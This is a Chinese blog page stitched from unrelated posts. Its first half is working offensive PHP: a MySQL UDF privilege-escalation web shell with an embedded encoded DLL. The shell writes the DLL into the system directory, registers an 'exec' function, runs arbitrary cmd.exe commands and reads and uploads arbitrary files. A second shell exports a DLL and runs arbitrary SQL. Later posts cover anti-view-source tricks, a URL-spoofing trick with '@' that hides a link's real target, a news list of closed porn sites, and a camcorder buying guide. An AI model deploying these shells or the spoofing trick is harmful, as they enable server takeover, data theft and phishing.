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";

//$mix_path=dirname($_SERVER['COMSPEC'])."\\\\Mysql_mix.dll";

//数据库连接
if($_SESSION["logon"]!="Yes")
{

if (@mysql_connect($servername.":".$serverport,$dbusername,$dbpassword) AND @mysql_select_db($dbname))
{
   echo "数据库连接成功!<br>";
   $_SESSION["logon"]="Yes";
   session_register("servername");
   session_register("serverport");
   session_register("dbusername");
   session_register("dbpassword");
}
else {
        echo "登陆失败<br>";
}
}

else echo "数据库连接成功!<br>";

//权限探测
if(mysql_query("select * from mysql.func")) echo "恭喜,权限足够!<br>";
else echo "权限可能不够哦!";

//善前工作
@mysql_query("Drop TABLE jnc_temp");
@mysql_query("DROP FUNCTION exec");

//建立临时表
if(mysql_query("CREATE TABLE jnc_temp (test MEDIUMBLOB)"))
{echo "临时表建立成功!<br>";}
else {  
echo mysql_error();
                die();
     }

//系统信息探测
if(strpos(echofile('c:\boot.ini'),'XP')) $system='Xp';
if(strpos(echofile('c:\boot.ini'),'2000')) $system='2000';
if(strstr(echofile('c:\boot.ini'),'2003')) $system='2003';
if(echofile('/etc/passwd')!='') $system='*inx';
session_register("system");
echo "可能是 ".$_SESSION["system"]." 系统<br>";

//临时文件以及系统目录
if($system=='Xp'|| $system=='2003') {$temp="c:\\\\windows"."\\\\temp"."\\\\jnc.txt";$mix_path="c:\\\\windows"."\\\\system32"."\\\\Mysql_mix.dll
";}

if($system=='2000') {$temp="c:\\\\winnt"."\\\\temp"."\\\\jnc.txt";$mix_path="c:\\\\winnt"."\\\\system32"."\\\\Mysql_mix.dll";}

//生成Mix.dll
if($_SESSION["mix_ok"]!='Yes')
{
$tmp = base64_decode(gzuncompress(base64_decode($Mixdll)));
$mysql_tmp = "0x".bin2hex($tmp);
//mysql_query("insert into jnc_temp values($mysql_tmp)");
//echo "insert into jnc_temp values('$tmp')";
//die();
if(mysql_query("select $mysql_tmp from jnc_temp into outfile '$mix_path'")) {echo "释放dll到系统目录成功!<br>";session_register("mix_ok");$_SESSION["mix_ok"] ='Yes';}

else {echo "释放dll到系统目录失败!可能文件已经存在<br>";
//    echo mysql_error();
//   $mix_path=$_SERVER["SystemRoot"]."\\\\temp"."\\\\Mysql_mix.dll
";
//      echo "尝试释放到系统临时目录<br>";
//   $fp = fopen($mix_path,"w");
//   echo
$msg=@fwrite($fp,$tmp) ? "尝试释放到系统临时目录成功!<br>" : "尝试释放到系统临时目录失败!<br>";
//      if(@fwrite($fp,$tmp)) {echo "尝试释放到系统临时目录成功!<br>";session_register("mix_ok");$_SESSION ["mix_ok"]='Yes';fclose($fp);}
//   else {echo "尝试释放到系统临时目录失败!<br>";}
//    fclose($fp);
//    die();
   }
//echo $_SESSION["mix_ok"];
}

else echo "Mix.dll生成成功<br>";

//建立函数$mix_path
if(mysql_query("CREATE FUNCTION exec RETURNS STRING SONAME '$mix_path'"))
echo "函数建立成功<br>";
else echo mysql_error();
?>

<?

if($_POST[file]!='') $file=$_POST[file];

$command="cmd.exe /D /C \"net user"." >"."$temp"."\"";

if($_POST[cmd]!='') $command="cmd.exe /D /C \"".$_POST[cmd]." >$temp"."\"";

//执行命令并且回显结果
if($_POST[cmd]!='') {
if(mysql_query("select exec('$command')"))
echo "执行命令成功<br><br>";
else echo mysql_error();
echo echofile($temp);
@mysql_query("select exec('del $temp')");
}

if($_POST[file]!='')
{
$file=str_replace("
\\","/",$file);
echo "文件读取成功<br><br>";
echo echofile($file);
}

if($_POST[sourcefile]!=''&&$_POST[targetfile]!='')
{
$file_temp="0x".bin2hex(reverse_string(echofile($_POST[sourcefile])));
if(mysql_query("select $file_temp from jnc_temp into outfile '$_POST[targetfile]'"))
{
echo "文件成功从$_POST[sourcefile]复制到$_POST[targetfile]成功!<br>";
}
else {echo mysql_error();echo "文件复制失败,可能目标文件已经存在!<br>";}

}

if($_POST[filepath]!='')
{
$fp = fopen($_FILES['upload']['tmp_name'],rb);
$contents = fread ($fp, filesize ($_FILES['upload']['tmp_name']));
    $upload_tmp = "0x".bin2hex($contents);
//    echo $upload_tmp;
if( mysql_query("select $upload_tmp from jnc_temp into outfile '$_POST[filepath]'") )
    {
     echo "文件成功上传到$_POST[filepath]";
    }
else {echo mysql_error();echo "文件上传失败,请检查目标文件是否已经存在和路径是否正确!<br>";}

}

if ($action!='') logout();

//善后处理
@mysql_free_result($result);
@mysql_query("Drop TABLE jnc_temp");
//@mysql_query("DROP
FUNCTION exec");
mysql_close();
?>

<br>
<br>
<br>
<center>&copy; Mysql提权的Mix</center>

-----------------------------------------------------------------------------------------------------------------------------------

       下面是My_ Udf.dll的代码复制保存为Udf.php文件:

<?php
error_reporting(7);
ob_start();
session_start();
?>
<html>
<head>
   <title>Mysql提权的UDF 专用网马</title>
</head>
<body>
<?php

if(!empty($_GET['action']) && $_GET['action']=='help')
mysql_help();

//-----------------------------------------------------------------------------------起始输入
if(empty($_GET['action']))
{

?>
<form action="?action=connect" method=POST>
   <table>
   <tr><td>host:</td><td><input type="text" name="host" size="30"></td></tr>
   <tr><td>mysql账号:</td><td><input type="text" name="username" size="30"></td></tr>
   <tr><td>密码:</td><td><input type="text" name="password" size="30"></td></tr>
   <tr><td>数据库名:</td><td><input type="text" name="dbname" size="30"></td></tr>
   <tr><td>&nbsp;</td><td><input type="submit" name="submit" value="提交">&nbsp;&nbsp;&nbsp;<input type="reset" name="reset" value="重填"></td></tr>
</form>
<?php
exit;
}

if(!empty($_GET['action']))//连接mysql
{
if(!empty($_POST['host']))
   $_SESSION['host']=$_POST['host'];
if(!empty($_POST['username']))
   $_SESSION['username']=$_POST['username'];
if(!empty($_POST['password']))
   $_SESSION['password']=$_POST['password'];
if(!empty($_POST['dbname']))
   $_SESSION['dbname']=$_POST['dbname'];
  
$dbconn=@mysql_connect($_SESSION['host'],$_SESSION['username'],$_SESSION['password']);
if(!$dbconn)
{
   $_SESSION['host']=$_SESSION['username']=$_SESSION['password']=$_SESSION['dbname']='';
   die('数据库连结失败,请检查账号信息。'. mysql_error().' &nbsp;<a href="javascript:history.back()">返回重填</a>' );
}
else
   echo 'MYSQL连结成功<br><br>';
//选择数据库
@mysql_select_db($_SESSION['dbname']);
$err = mysql_error();
if($err)
{
   echo '切换数据库出错,请检查数据库'.$_SESSION['dbname'].'是否存在。'.$err.'&nbsp;<a href="javascript:history.back()">返回重填</a>';
   $_SESSION['dbname']='';
   mysql_close($dbconn);
   exit;
}
}
//-----------------------------------------------------------------------------------------导出DLL
if(!empty($_POST['dllpath']) )
$path=stripslashes($_POST['dllpath']);
if($path=='')
$path=$_SESSION['dllpath'];
if($path=='')
$path="C:\\Winnt\\udf.dll";

echo '<form action="?action=buildDLL&" method=POST>';
echo 'DLL导出路径:<font color="#FF0000">注意:</font>MYSQL 5.0以上版本请使用系统目录!<br><input type="text" name="dllpath" size="40" value="'. $path.'">&nbsp;&nbsp;<input type="submit" name="submit" value="导出到此目录">';
echo '</form>';
if(!empty($_GET['action'])&&$_GET['action']=='buildDLL')
{
$_SESSION['dllpath']=$path;
if(strpos($_SESSION['dllpath'],'.')==false)
   if(strrpos($_SESSION['dllpath'],'\\')==false || strrpos($_SESSION['dllpath'],'\\')!=strlen($_SESSION['dllpath'])-1)
    $_SESSION['dllpath']= $_SESSION['dllpath'].'\\udf.dll';
   else
    $_SESSION['dllpath']=$_SESSION['dllpath'].'udf.dll';

$query="CREATE TABLE Temp_Tab (udf BLOB);";
if(!mysql_query($query, $dbconn))
   echo '错误:创建临时表Temp_Tab出错。'.mysql_error();
else
{
   $shellcode=shellini();
   $query="INSERT into Temp_Tab values (CONVERT($shellcode,CHAR));";
   if(!mysql_query($query, $dbconn))
    echo '错误:插入DLL数据出错。'.mysql_error();
   else
   {
    $temp=str_replace("\\\\","\\",$_SESSION['dllpath'
]);
    $temp=str_replace("
\\","\\\\",$temp);
    $query="SELECT udf FROM Temp_Tab INTO DUMPFILE '".$temp."';" ;
    //echo $query;
    if(!mysql_query($query, $dbconn))
     echo '导出DLL文件出错:'.mysql_error();
    else
    {
     echo 'DLL已成功的导出到'.$_SESSION['dllpath'].'<br>';
    }
   }
   mysql_query('DROP TABLE Temp_Tab;', $dbconn);
   $query='';
}
}
echo '<hr><br>';
//-----------------------------------------------------------------------------------------执行SQL语句
if(!empty($_POST['query']))
$query=stripslashes($_POST['query']);

echo '<form action="?action=SQL&" method=POST>';
echo 'SQL命令:<br><input type="text" name="query" size="60" value="'. $query .'">&nbsp;&nbsp;&nbsp;<input type="submit" value="执行">';
echo '</form>';

$query=str_replace("\\\\","\\",$query);
$query=str_replace("
\\","\\\\",$query);
if($query!='' && $_GET['action']=='SQL')
{
$result = mysql_query($query, $dbconn);
$err = mysql_error();
if($err)
{
   echo '数据库查讯出错,请检查SQL语句'.$query.'的语法是否正确。'.mysql_error();
}
else
{
   echo '回显结果:<br>';
   echo '<textarea cols="122" rows="22" wrap="soft">';
  
   if(strtolower(substr($query,0,6))=='select')//检验是不是查讯语句
   {
    for($i=0;$i<mysql_num_fields($result);$i++)
     echo mysql_field_name($result,$i)."\t";
    echo "\r\n\r\n";
   
    while($row = mysql_fetch_array($result))
    {
     for($i=0;$i<mysql_num_fields($result);$i++)
     {
      echo htmlspecialchars($row[$i])."\t";
     }
     
     echo "\r\n";
    }
   }
   else
    echo "   执行成功\r\n";
   
   echo '-----------------------------------';
   echo '</textarea>';
}
}
mysql_close($dbconn);
//-----------------------------------------------------------------------------------------底部信息

?>

<br><br><hr>
<center>
<font color="#886688" size="3">&copy; Mysql提权的UDF</font>
</center>

</body>
</html>

谢谢关注我的space :http://ytfso.yi.org

我的QQ空间
常用代码之:禁止右键、禁止查看源代码、禁止另存为的代码
常用代码之:禁止右键、禁止查看源代码、禁止另存为的代码1、禁止...
 
 

常用代码之:禁止右键、禁止查看源代码、禁止另存为的代码

| | 0 评论 |

  
 
常用代码之:禁止右键、禁止查看源代码、禁止另存为的代码
1、禁止右键
<html>
<head>
<script>
function stop(){
alert("试试能破解吗?";
return false;
}
document.oncontextmenu=stop;
</script>
<boyd>你可以按右键、shift+F10和右ctrl左边的那个键试试!看能不能解。^_^</body>

2、禁示查看源代码
我们已经禁了右键,但从"查看"菜单下的"源文件"中同样可以看到源代码,下面我们就来解决这个问题:
其实这只要使用一个含有<frame></frame>标记的网页便可以达到目的。
<frameset>
<frame src="你要保密的文件的URL">
</frameset>
这样当有人使用"查看"下的"源文件"的时候,看到的将是上面的那段代码,而你真正的文件又躲过一劫。

3、禁示另存为
通过上面的两步好像你的源代码已经安全了,但别忘了,别人还可以将你的页面保存下来,再慢慢分析。不过别担心,下面我们来解决这个问题。
在你要保密的网页中加入以下代码:
<noscript>
<iframe src="*.htm"></iframe>
</noscript>
现在如果有人想保存你的网页,等他保存到一部分的时候IE就会帮你告诉他,无法保存该WEB页,并将己保存的那部分文件删除。



<noscript><iframe src=*></iframe></noscript>
放在<BODY></BODY>之间

加了上面的代码后,文件是不可以另存,但是改变存储的属性,比如改存文本格式页面就可以另存了



[-关于保护-]

先通过代码来禁止IE的一些操作


:禁止另存为

<NOSCRIPT><IFRAME SRC=*.html></IFRAME></NOSCRIPT>
:取消选取、防止复制 不准粘贴 防止复制>
<BODY
bgColor=#ffffff leftMargin=0 topMargin=0>

:禁止右键>

<SCRIPT language=JavaScript>
<!--
if (window.Event)
document.captureEvents(Event.MOUSEUP);
function nocontextmenu()
{
event.cancelBubble = true
event.returnValue = false;
return false;
}

function norightclick(e)
{
if (window.Event)
{
if (e.which == 2 || e.which == 3)
return false;
}
else
if (event.button == 2 || event.button == 3)
{
event.cancelBubble = true
event.returnValue = false;
return false;
}
}
document.oncontextmenu = nocontextmenu; // for IE5+
document.onmousedown = norightclick; // for all others
//-->
</SCRIPT>

:状态栏固定
<body bgcolor="#fef4d9" >



后台/网站属性/开启新闻版权保护功能


:禁止缓存 在页面中使用HTML标记,如下面:

<HEAD>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>
-利用上面的代码可以禁止下面几种手段-
1:右键 - 查看原文件
3:文件 - 另存为
4:IE缓存
-用代码本身很难禁止下面的手段我门就迷惑的方法阻止调出原代码-
2:查看 - 原文件
5:还可以通过代码提取
URL欺骗(可以隐藏真实地址)

教程代码:
<meta http-equiv="refresh" content="0;url='http://东邪.明天毕竟又是新的一天 @www.cncms.com.cn/index.htm'">
注意代码中url='http://东邪.明天毕竟又是新的一天 @www.cncms.com.cn/index.htm'"
@ 符号前面的[http://东邪.明天毕竟又是新的一天]就是欺骗后在IE中出现的效果 也可以是 http://www.163.com
后面的不用说就是连接的真实地址 www.cncms.com.cn/index.htm
URL迷惑
<meta http-equiv="refresh" content="0;url='http://东邪.明天毕竟又是新的一天 @.htm'">
注意这一段和上面的有什么不同对就是.htm 那.htm是什么呢呵呵其实就是真实地址
怎么访问呢 有.htm吗?呵呵我门要做的就就做一个没有名字的HTM
方法很简单先创建个XXX.htm 上传到 QQ网络硬盘 双激文件名将XXX删除 怎么样.htm出来了吧,这样就算得到原代码很难看出真实地址.

列1:http://东邪.明天毕竟又是新的一天 @.htm
列2:http://www.163.com/ @.htm
呵呵很难看出真实地址是什么吧



[JS禁止 用IE - 查看 - 原文件]
也是迷惑的方法 但是可以绝对禁止以上面的方式调用原文件
要用到JS
教程JS代码
var oPopup = window.createPopup();
var popTop=50;
function popmsg(msgstr)
{
var winstr="<table style=/"border: 1 solid #000000/" width=/"241/"
height=/"172/" border=/"0/" cellpadding=/"0/"
cellspacing=/"0/">";
winstr+="<tr><td height=/"150/"></td><td
align=/"center/"><table width=/"90%/" height=/"110/"
border=/"0/" cellpadding=/"0/" cellspacing=/"0/">";
winstr+="<tr><td valign=/"top/" style=/"font-size:12px;
color: #F00000; face: Tahoma/">"+msgstr+"</td></tr></table></td></tr></table>";
oPopup.document.body.innerHTML = winstr;
popshow();
}

function popshow()
{
window.status=popTop;
if(popTop>1720){
clearTimeout(mytime);
oPopup.hide();
return;
}
else if(popTop>1520&&popTop<1720)
{
oPopup.show(screen.width-250,screen.height,241,1720-popTop);
}
else if(popTop>1500&&popTop<1520)
{
oPopup.show(screen.width-250,screen.height+(popTop-1720),241,172);
}
else if(popTop<180)
{
oPopup.show(screen.width-250,screen.height,241,popTop);
}
else if(popTop<220)
{
oPopup.show(screen.width-250,screen.height-popTop,241,172);
}
popTop+=10000;
var mytime=setTimeout("popshow();",1);
}
popmsg(" ");

另存为 17789897.js


HTM调用JS代码
<SCRIPT language=javascript
src="17789897.js"></SCRIPT>
呵呵有写朋友可能熟悉但是我要告诉你他现在的作用是禁止同过 [IE - 查看 - 原文件]
区别在这段代码
popTop+=10000;
var mytime=setTimeout("popshow();",1);
看到了吗?速度是10000
不用我说也知道是什么意思了吧
把上面JS和HTM调用JS代码
加到网页里就可以禁止 [IE - 查看 - 原文件]
关于保护我知道的就这些.

[-关于加密-]
我建议重要的代码采用复合加密
方式基本上有以下几种
JS编码
escape加密
8进制转义字符串
16进制转义字符串
10进制HTML编码如下
16进制HTML编码如下
都可以用<script>
<!--
document.write(unescape("加密后的代码"));
//-->
</script>
由于他门的代码很大还有JS文件我就不给了
大家可以去baidu.com搜索
[-关于破解-]
正所谓魔高一尺,道高一丈,再复杂的加密,在多的迷惑,还是要用IE来解码
给大家个超级技巧
在地址栏或按Ctrl+O,输入:
javascript:s=document.documentElement.outerHTML;document.write(<body></body>');document.body.innerText=s;
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果.


经常在网上逛的朋友,一定有看到漂亮的图片就想保存;看到漂亮的页面就忍不住要瞅瞅源代码的情况,可惜有些网友用javascript小程序禁止了鼠标右键功能,使我们无法保存和查看。那么,如何才能禁止鼠标右键功能,又如何解除呢?

给你的网页添加禁止鼠标右键的功能

其实这只是利用JavaScript实现的一个很简单的锁住鼠标右键的功能,我们只需将下面一段程序,加到你的网页上就可以了。其中的文字部分"对不起……"你可以随意替换为你喜欢的文字,就可以了。

〈SCRIPT language=javascript〉function click(){if(event.button==2){alert('对不起,你的右键功能在这里不能使用')}}document.onmousedown=click〈/SCRIPT〉

这样就可以禁止右键功能了。当在你的网页点击右键时,会弹出一个含有确定按钮的文字窗口。

如何破解禁止鼠标右键的功能

同样也很简单就能使禁止鼠标右键功能失效,具体做法有两种:

一是首先在页面目标上按下鼠标右键,弹出窗口,这时不要松开右键。接着将鼠标移到窗口的确定按钮上,同时按下左键。好了,现在松开鼠标左键,这时窗口消失。最后,再将鼠标移到目标上松开鼠标右键。好了,你想要的功能全出来了。你就又可以拷贝,或者用新窗口打开联接了。

二是对一点鼠标右键就出现添加到收藏夹窗口的网页,用上述方法不能破解,因为你用鼠标左键点取消的同时就失去了右键的目标的交点,我们用另外一种方法制服 它:首先还是在目标上点鼠标右键,出现添加到收藏夹的窗口,这时不要松开右键,也不要移动鼠标。接着使用键盘的Tab键,移动焦点到取消按钮上。按下空格 键,窗口消失。最后松开右键,好了,你要的功能全出来了。

我的QQ空间
教你如何选购DV数码摄像机
如何选购DV数码摄像机 目前市场上的数码摄像机额可分为四种:磁...
 
 

41家传播色情和低俗内容的违法违规网站被关闭

2009年7月25日星期六 | | 0 评论 |


 41家传播色情和低俗内容的违法违规网站被关闭 

  根据公众举报,并经有关部门核实,"极点美女图片"、"QVOD伦理片资源"、"TXT姐妹手机影视网"和"妹妹热舞视频网"等41家网站主要 刊登色情和低俗内容,违反了《全国人民代表大会常务委员会关于维护互联网安全的决定》、《互联网信息服务管理办法》、《互联网新闻信息服务管理规定》等法 律法规的规定,被依法关闭。

  全国整治互联网低俗之风专项行动办公室有关负责人指出,国务院新闻办、工业和信息化部、公安部、文化部、工商总局、广电总局、新闻出版总署等七 部门部署开展的整治互联网低俗之风专项行动,受到社会各界广泛关注和欢迎,广大网民积极支持这一行动。一些网站积极开展清理整治,并向社会公开致歉,但仍 有部分网站整治不力,有关部门正在全面清查,进一步加大整治力度。

  该负责人强调,打击网络淫秽色情、整治网上低俗之风,是一项长期任务,有关部门将严厉打击传播色情和低俗内容的行为,对违法违规网站发现一个处理一个,并依法追究违法人员的责任,为广大青少年的健康成长创造良好的网络环境。

  互联网违法和不良信息举报中心从全国整治互联网低俗之风专项行动办公室了解到,被依法关闭的网站名单如下:

  网站名称                                   服务器所在地

  1、 极点美女图片                              浙江省

  2、 QVOD伦理片资源                            上海市

  3、 TXT姐妹手机影视网                         安徽省

  4、 妹妹热舞视频网                            上海市

  5 、好图王                                    福建省

  6 、酷图屋娱乐                                福建省

  7 、最真实的偷拍网                            广西省

  8 、大大美图                                  福建省

  9、 美女图片                                  福建省

  10、 极品美女网                               福建省

  11、 漂漂美术馆                               福建省

  12、 看看吧图片                               广东省

  13、 0574美女欢乐谷                           广东省

  14、 日本明星网                               广东省

  15、 新宁王府人体艺术                         湖南省

  16、 美女伊娃网                               江苏省

  17 、美女艺术图片                             江苏省

  18、 丁香成人社区                             江苏省

  19、 美女游乐园                               江西省

  20、 33bbb偷拍走光                            山东省

  21、 暧昧美女                                 广东省

  22 、色色图片网                               广东省

  23、 美女图片馆                               广东省

  24、 无忧网络                                 浙江省

  25 、美人库                                   浙江省

  26 、欢欢美女图片                             浙江省

  27、 我就要图片网                             浙江省

  28、 男人后宫                                 浙江省

  29 、365天天情色网                            浙江省

  30、 美女图片专题站                           浙江省

  31、 uuiw.com                                 上海市

  32、 就是爱妹妹                               北京市

  33、 我妹妹                                   安徽省

  34、 吾要成人                                 广东省

  35、 丝袜美腿两性健康情感乐园                 北京市

  36 、色色美女视频                             安徽省

  37 、美女视频网                               江苏省

  38 、QVOD资源站                               四川省

  39、 龙英影视                                 北京市

  40、 丝袜美女                                 福建省

  41、 梦想岛                                   安徽省

  来源:互联网违法和不良信息举报中心

谢谢各位访问我的空间&博客 : http://ytfso.yi.org


我的QQ空间
教你如何选购DV数码摄像机
如何选购DV数码摄像机 目前市场上的数码摄像机额可分为四种:磁...
 

教你如何选购DV数码摄像机

2009年7月23日星期四 | | 0 评论 |

  
 

如何选购DV数码摄像机 目前市场上的数码摄像机额可分为四种:磁带摄像机、DVD摄像机、高清摄像机、硬盘摄像机,这四种摄像机的记录介质分别为:磁带,8cm(3英寸)的 DVD-R/DVD-RW光盘,DV磁带,硬盘。我以前对DC也不很了解,但通过此购买学到了不少相关知识,所以在这里总结起来供大家参考,愿能对打算购 买数码摄像机的朋友有个帮助。(共四篇)
   现在的DV厂商和商家们都给其品牌配备了比较详细的介绍资料。不过初购机消费者对于这些东东,往往不看还好,看了反而更是一头雾水,不知其所云。笔者也不 想对着资料讲经布道般的又向大家灌迷魂汤,只是想就本人经验对购买DV机可能出现的一些常见问题作个通俗化的解答。
   一、家庭购买数码相机应注意的因素

1、购买数码摄像机需要关注像素吗? 这是个最基本的问题,不少人可能受数码相机的概念影响,从而把像素也作为了一个购买指标。现在数码摄像机基本上都是以80万像素CCD水平为起点,以前由 于制式及工艺方面问题,出现过57万和60多万的像素机型。比如前几年,松下出品的DS35和DS55机型就是采用57万像素CCD。目前除了高静像素的 DV选购问题外,没必要去关注像素。DV摄像的格式是720x576,换算约为720x576=414,720像素。57万像素都足够应付,80万像素就 更没问题。多余的像素主要是用于防抖。

2、CCD大小及静像素有多重要? 理论上来说,CCD(电荷藕合器)是尺寸越大越好,CCD尺寸大小区别主要是在低光或暗光环境下的效果差别。现在市场上常见的CCD尺寸主要有1/3英 寸、1/3.4英寸、1/3.6英寸、1/4英寸、1/4.5英寸、1/4.7英寸、1/5英寸和1/6英寸这几种。
    就家用数码摄像机这块来讲,大尺寸的如1/3英寸和1/3.6CCD,主要是用于拍摄更高的静像的作用。对DV动态影像效果而言,如果是不计较价格 的前提下,当然首推索尼PC330E、PC350E及HC85E等机型。毕竟它们在光线条件较差的情况下表现要明显强过配备1/5英寸和1/6英寸CCD 的DV机。
   最佳CCD选择应该是在1/4英寸到1/4.7英寸之间,这是从性价比出发考虑。其次也可以选择配备1/3.6英寸CCD机的V75E及HC85E,最 少它们的价格还没过万元这么吓人。至于静像素方面,最多也就是考虑一下具有百万静像素的功能DV机即可,太高就没必要了。在3000元不到就能买到500 万像素的数码相机,凭什么要花一万多元去考虑那300万静像素?说实话,如果不是为了较大CCD的选择,静像功能完全可以不用考虑。以前1/4英寸CCD 是家用级DV机的基本配备,而现在CCD尺寸做得大点是为了具有百万像素以上的拍摄功能。 家用DV机其实无论是1/5英寸还是1/6英寸CCD都够用了,在夜晚和暗光条件下虽然拍摄效果不佳,但家用几个能专挑光线不好时拍摄啊。在光线较好条件 下,1/3英寸CCD和1/6英寸CCD拍摄效果区别不是很大。这就好比美国的F117隐型战斗机,你在白天照样用肉眼能发现它。主要是要看使用的环境来 选择。

3、莱卡和蔡斯镜头是不是能够有更好的拍摄效果? 不少初次购买DV机的消费者常常遇见这样的疑问,很多DV机价格要高出一头,而商家和资料上都注明这些DV机型大都配备了莱卡或是蔡斯镜头,所以价格要高 出一些。是不是配备了莱卡或蔡斯镜头的DV机就一定效果要好于没有配备的机型?是否一定要购买标有莱卡或蔡斯镜头的机器?
   首先笔者要说明一点,莱卡和蔡斯都是有名的镜头品牌,它们都来自德国。莱卡和蔡斯公司生产的镜头不仅用于民用领域,而且广泛的用于军事领域。因此说这两 个品牌的镜头有着极大知名度。不过如果用于家用级DV的话,笔者个人认为这是种商业噱头和炒作。就成像效果而言,绝不会比没使用莱卡或蔡斯镜头的DV机有 质的飞跃,最多是镜头涂层好一点而已。想想看,索尼HC15E这样的入门级DV都配备了蔡斯镜头,那么这个蔡斯镜头的身价恐怕要打点折扣了。就像打有 HONDA商标的发动机很可能大都是国内生产而已,这些标称有莱卡和蔡斯商标的镜头也不可太过看重,充其量是日本DV厂商买了德国人的商标而已。当然如果 是用在民用级的专业级DV机上,那么这个镜头品牌所带来的份量感和价值感就不可同日而语。笔者看法,万元以下机器,可以不考虑镜头是否采用莱卡或蔡斯。如 果是万元以上机器,那就应该考虑镜头。另外,索尼T*级镜头以下蔡斯镜头也可以不考虑镜头的差别,当然这是指它和其它品牌DV相比,索尼现在全系列都是蔡 斯镜头,蔡斯早不值钱了。

4、镜头口径大小,变焦倍数如何看待和选择? 先说说变焦倍数,这是很多人购买DV机所看重的一个指标。一般家用DV机的光学变焦是10倍,基本上够用了。这两年,松下和JVC在佳能的大光学变焦鼓动 下,纷纷加入到了大光学变焦的制造中来。惟一还没有动静的就是索尼。索尼作为DV界中的龙头老大,反而奇怪的对新趋势没有关注了。主要是因为索尼机器有一 个原则,就是保持其性能上的可靠性。
